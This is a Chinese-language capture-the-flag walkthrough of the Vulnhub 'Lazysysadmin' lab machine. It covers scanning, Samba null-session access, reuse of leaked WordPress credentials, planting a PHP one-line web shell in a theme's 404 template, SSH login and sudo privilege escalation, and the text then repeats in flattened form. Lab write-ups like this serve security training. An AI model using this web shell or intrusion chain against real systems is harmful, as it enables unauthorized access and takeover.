Vulnhub靶场之Lazysysadmin
字数 1276 2025-08-15 21:32:43

Lazysysadmin靶机渗透测试详细教程

靶机概述

Lazysysadmin是Vulnhub上的一个初级难度靶机,主要考察信息收集、漏洞利用和权限提升等基础渗透测试技能。靶机环境包含多种常见服务如WordPress、phpMyAdmin和Samba等。

环境准备

  1. 下载靶机镜像并导入VMware/VirtualBox
  2. 配置攻击机(Kali Linux)和靶机处于同一网络(NAT模式)
  3. 确保网络连通性

信息收集阶段

1. 网络扫描

使用nmap扫描整个网段,确定靶机IP:

nmap -sn 192.168.1.0/24

发现靶机IP后,进行详细扫描:

nmap -A -T4 -p- 192.168.1.XX

扫描结果应显示开放端口:

  • 22/tcp SSH
  • 80/tcp HTTP
  • 139/tcp Samba
  • 445/tcp Samba
  • 3306/tcp MySQL

2. Web服务枚举

访问http://192.168.1.XX进行初步侦察

目录扫描

使用dirb或gobuster扫描web目录:

gobuster dir -u http://192.168.1.XX -w /usr/share/wordlists/dirb/common.txt

发现以下重要路径:

  • /info.php
  • /phpmyadmin/
  • /wordpress/
  • /wordpress/wp-admin/
  • /robots.txt

WordPress扫描

使用wpscan扫描WordPress漏洞:

wpscan --url http://192.168.1.XX/wordpress --enumerate

3. Samba服务检查

检查Samba共享:

smbclient -L //192.168.1.XX/

发现空会话漏洞:

smbclient -N //192.168.1.XX/sharename

漏洞利用阶段

1. WordPress凭证获取

通过Samba共享访问WordPress配置文件:

smbclient //192.168.1.XX/sharename
> get wp-config.php

查看配置文件获取数据库凭证:

more wp-config.php

发现数据库账号密码:Admin/TogieMYSQL12345^^

2. phpMyAdmin登录

使用获取的凭证登录phpMyAdmin:

URL: http://192.168.1.XX/phpmyadmin
用户名: Admin
密码: TogieMYSQL12345^^

3. WordPress后台利用

使用相同凭证登录WordPress后台:

URL: http://192.168.1.XX/wordpress/wp-admin

编辑404页面插入PHP后门:

  1. 进入"外观"->"编辑器"
  2. 选择"404 Template"
  3. 插入PHP一句话木马:
<?php system($_GET['cmd']); ?>
  1. 保存修改

4. WebShell获取

通过Samba共享定位修改的404页面路径(通常在twentyfifteen目录下):

smbclient //192.168.1.XX/sharename
> ls
> cd wordpress/wp-content/themes/twentyfifteen
> get 404.php

验证WebShell:

http://192.168.1.XX/wordpress/wp-content/themes/twentyfifteen/404.php?cmd=id

使用更强大的WebShell工具连接(如中国菜刀或蚁剑)。

权限提升阶段

1. SSH登录

通过信息收集发现:

  • WordPress页面提到用户"togie"
  • Samba共享中发现疑似密码文件,内容为"12345"

尝试SSH登录:

ssh togie@192.168.1.XX
密码: 12345

2. 特权提升

检查sudo权限:

sudo -l

发现togie用户可无密码执行所有sudo命令:

sudo su

3. 获取flag

切换到root用户后,在系统常见位置查找flag文件:

find / -name *flag* -o -name *proof* -o -name *.txt 2>/dev/null

通常在/root目录下找到flag文件。

总结

本靶机渗透路径:

  1. 信息收集发现Samba空会话漏洞
  2. 通过Samba获取WordPress数据库凭证
  3. 利用凭证登录WordPress后台并植入WebShell
  4. 通过信息泄露获取SSH凭证
  5. 利用不当的sudo配置实现特权提升

关键点:

  • 全面的服务枚举和信息收集
  • 凭证重用(WordPress与phpMyAdmin使用相同凭证)
  • 不安全的文件权限(Samba共享暴露配置文件)
  • 过度的sudo权限配置
Lazysysadmin靶机渗透测试详细教程 靶机概述 Lazysysadmin是Vulnhub上的一个初级难度靶机,主要考察信息收集、漏洞利用和权限提升等基础渗透测试技能。靶机环境包含多种常见服务如WordPress、phpMyAdmin和Samba等。 环境准备 下载靶机镜像并导入VMware/VirtualBox 配置攻击机(Kali Linux)和靶机处于同一网络(NAT模式) 确保网络连通性 信息收集阶段 1. 网络扫描 使用nmap扫描整个网段,确定靶机IP: 发现靶机IP后,进行详细扫描: 扫描结果应显示开放端口: 22/tcp SSH 80/tcp HTTP 139/tcp Samba 445/tcp Samba 3306/tcp MySQL 2. Web服务枚举 访问http://192.168.1.XX进行初步侦察 目录扫描 使用dirb或gobuster扫描web目录: 发现以下重要路径: /info.php /phpmyadmin/ /wordpress/ /wordpress/wp-admin/ /robots.txt WordPress扫描 使用wpscan扫描WordPress漏洞: 3. Samba服务检查 检查Samba共享: 发现空会话漏洞: 漏洞利用阶段 1. WordPress凭证获取 通过Samba共享访问WordPress配置文件: 查看配置文件获取数据库凭证: 发现数据库账号密码: Admin/TogieMYSQL12345^^ 2. phpMyAdmin登录 使用获取的凭证登录phpMyAdmin: 3. WordPress后台利用 使用相同凭证登录WordPress后台: 编辑404页面插入PHP后门: 进入"外观"->"编辑器" 选择"404 Template" 插入PHP一句话木马: 保存修改 4. WebShell获取 通过Samba共享定位修改的404页面路径(通常在twentyfifteen目录下): 验证WebShell: 使用更强大的WebShell工具连接(如中国菜刀或蚁剑)。 权限提升阶段 1. SSH登录 通过信息收集发现: WordPress页面提到用户"togie" Samba共享中发现疑似密码文件,内容为"12345" 尝试SSH登录: 2. 特权提升 检查sudo权限: 发现togie用户可无密码执行所有sudo命令: 3. 获取flag 切换到root用户后,在系统常见位置查找flag文件: 通常在/root目录下找到flag文件。 总结 本靶机渗透路径: 信息收集发现Samba空会话漏洞 通过Samba获取WordPress数据库凭证 利用凭证登录WordPress后台并植入WebShell 通过信息泄露获取SSH凭证 利用不当的sudo配置实现特权提升 关键点: 全面的服务枚举和信息收集 凭证重用(WordPress与phpMyAdmin使用相同凭证) 不安全的文件权限(Samba共享暴露配置文件) 过度的sudo权限配置